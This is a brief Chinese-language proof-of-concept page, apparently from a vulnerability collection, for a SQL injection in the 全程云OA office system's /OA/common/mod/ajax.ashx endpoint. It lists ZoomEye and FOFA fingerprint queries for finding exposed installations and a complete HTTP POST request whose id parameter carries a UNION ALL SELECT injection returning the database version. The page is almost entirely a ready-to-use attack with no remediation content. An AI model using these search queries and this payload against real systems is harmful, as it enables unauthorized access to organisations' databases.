跳到主要内容

全程云OA__ajax.ashxSQL注入漏洞

全程云OA__ajax.ashxSQL注入漏洞

zoomeye

app:"全程云OA"

fofa

".passImg{background:url(images/yiyaoshi.png)"

poc

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+

image